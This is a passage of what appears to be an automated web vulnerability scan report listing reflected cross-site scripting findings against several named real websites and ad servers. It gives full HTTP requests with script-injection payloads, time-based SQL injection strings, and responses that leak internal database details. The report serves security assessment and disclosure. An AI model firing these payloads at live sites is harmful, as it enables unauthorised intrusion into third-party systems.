Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 502

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '-111' OR SLEEP(25)=0 LIMIT%2/acfaf<script>alert(1)</script>dffcf9b871801--'<br>
...[SNIP]...
5.9. http://depot.activalive.com/app/deployment.php [d[] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://depot.activalive.com
Path:   /app/deployment.php

Issue detail

The value of the d[] request parameter is copied into the HTML document as plain text between tags. The payload 9e6c5<script>alert(1)</script>2ac58b1cb32 was submitted in the d[] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/deployment.php?id=5930&ptid=5930-13937bf0e-a621-46f8-934f-34f158f4a901&stid=13937bf0e-a621-46f8-934f-34f158f4a901&oref=Direct&chat=null&r=0.5038613956421614&d[]=52219e6c5<script>alert(1)</script>2ac58b1cb32&b[]=14187 HTTP/1.1
Host: depot.activalive.com
Proxy-Connection: keep-alive
Referer: http://www.firehost.com/secure-hosting/pci?_kk=PCI%20compliance%20scanning&_kt=538c084f-5d5b-43c7-83f9-c71a7300c9e6&gclid=CLyMisrV1KgCFQNx5Qodz0X8fA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:18:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Content-Length: 550
Connection: close
Content-Type: text/javascript;charset=iso-8859-1

_alc.monitoring.push(5221);
_alc.__setStartDeptStatus(52219e6c5<script>alert(1)</script>2ac58b1cb32, false);
_alc.__setStartDeptStatus(5221, true);
delete _alc.__setStartDeptStatus;
_alc.setup(10596, 5930);
_alc.handleInvite = _alc.rollDownInvite;
_alc.handleInviteRejection = _alc.rollBackInvite;
_a
...[SNIP]...
5.10. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dinclinx.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 79937<script>alert(1)</script>4b3b2809a1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=103&e=0&t=21&f=javascript&79937<script>alert(1)</script>4b3b2809a1c=1 HTTP/1.1
Host: dinclinx.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 21:50:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 06 May 2011 21:50:11 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter 79937<script>alert(1)</script>4b3b2809a1c
5.11. https://events.gsmiweb.com/subscribe.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2b634<script>alert(1)</script>f3a70d330da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /subscribe.php?event_id=-111%20OR%20SLEEP(25)=0%20LIMIT%20/2b634<script>alert(1)</script>f3a70d330da1--+ HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:23:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=fvqe9k1kjfhqn1gq57olpgq8c1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 315
Connection: close
Content-Type: text/html


<script language="javascript">
window.location.href="events.php";
</script>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/2b634<script>alert(1)</script>f3a70d330da1-- AND
        type = 1 AND active = 1 ' at line 3
5.12. http://image.providesupport.com/cmd/advancedaccess [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/advancedaccess

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ce1e<script>alert(1)</script>41bc3fc6507 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmd9ce1e<script>alert(1)</script>41bc3fc6507/advancedaccess?ps_t=1304725194130&ps_l=http%3A//www.advancedaccess.com/&ps_r=&ps_s=pNpFk6ofuQKf HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=pNpFk6ofuQKf

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 06 May 2011 18:40:14 GMT
Content-Length: 545

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmd9ce1e<script>alert(1)</script>41bc3fc6507/advancedaccess?ps_t=1304725194130&ps_l=http://www.advancedaccess.com/&ps_r=&ps_s=pNpFk6ofuQKf
</pre>
...[SNIP]...
5.13. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/advancedaccess/safe-monitor.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ce53d<script>alert(1)</script>bdd2d651cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsce53d<script>alert(1)</script>bdd2d651cf0/advancedaccess/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 06 May 2011 18:39:59 GMT
Content-Length: 574

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /jsce53d<script>alert(1)</script>bdd2d651cf0/advancedaccess/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847
</pre>
<!-- =====================
...[SNIP]...
5.14. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/advancedaccess/safe-monitor.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f0a6<a>a8f8fbe4fcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/advancedaccess4f0a6<a>a8f8fbe4fcc/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.advancedaccess.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Fri, 06 May 2011 18:40:01 GMT
Content-Length: 552

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/advancedaccess4f0a6<a>a8f8fbe4fcc/safe-monitor.js?ps_h=dTmJ&ps_t=1304725193847
</pre>
<!-- ===========================================
...[SNIP]...
5.15. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4caf"-alert(1)-"ec16db5a7c7 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093c4caf"-alert(1)-"ec16db5a7c7&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:41 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4298
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093c4caf"-alert(1)-"ec16db5a7c7");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093c4caf"-alert(1)-"ec16db5a7c7");
mpck = "h
...[SNIP]...
5.16. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 721fc'%3balert(1)//ead46c1023b was submitted in the mpck parameter. This input was echoed as 721fc';alert(1)//ead46c1023b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093721fc'%3balert(1)//ead46c1023b&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:43 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4304
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-1?mpt=5423093721fc';alert(1)//ead46c1023b" target="_blank">
...[SNIP]...
5.17. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f92f9'%3balert(1)//e1637aca820 was submitted in the mpvc parameter. This input was echoed as f92f9';alert(1)//e1637aca820 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3ff92f9'%3balert(1)//e1637aca820 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:51:23 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4300
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?f92f9';alert(1)//e1637aca820http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-1?mpt=5423093" target="_blank">
...[SNIP]...
5.18. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/300x250_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22bea"%3balert(1)//050f33362ed was submitted in the mpvc parameter. This input was echoed as 22bea";alert(1)//050f33362ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/300x250_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-1%3Fmpt%3D5423093&mpt=5423093&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b00/3/0/%2a/b%3B241006849%3B0-0%3B1%3B37579671%3B4307-300/250%3B42070593/42088380/1%3B%3B%7Esscs%3D%3f22bea"%3balert(1)//050f33362ed HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:51:21 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT
ETag: "555379-d9c-49e3c5474a6c0"
Accept-Ranges: bytes
Content-Length: 4300
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?22bea";alert(1)//050f33362ed");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b00/3/0/*/b;241006849;0-0;1;37579671;4307-300/250;42070593/42088380/1;;~sscs=?22bea";
...[SNIP]...
5.19. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14867"-alert(1)-"af246ecfe7f was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D57013914867"-alert(1)-"af246ecfe7f&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:52 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4280
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D57013914867"-alert(1)-"af246ecfe7f");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D57013914867"-alert(1)-"af246ecfe7f");
mpck = "ht
...[SNIP]...
5.20. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4888f'%3balert(1)//bc918fe2e78 was submitted in the mpck parameter. This input was echoed as 4888f';alert(1)//bc918fe2e78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D5701394888f'%3balert(1)//bc918fe2e78&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:50:54 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4286
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3aff/3/0/*/f;241006852;0-0;0;37579671;3454-728/90;42070397/42088184/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/16228-124632-16454-0?mpt=5701394888f';alert(1)//bc918fe2e78" target="_blank">
...[SNIP]...
5.21. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e11d8'%3balert(1)//93f53f18417 was submitted in the mpvc parameter. This input was echoed as e11d8';alert(1)//93f53f18417 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-16454-0%3Fmpt%3D570139&mpt=570139&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aff/3/0/%2a/f%3B241006852%3B0-0%3B0%3B37579671%3B3454-728/90%3B42070397/42088184/1%3B%3B%7Esscs%3D%3fe11d8'%3balert(1)//93f53f18417 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:51:52 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 4282
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
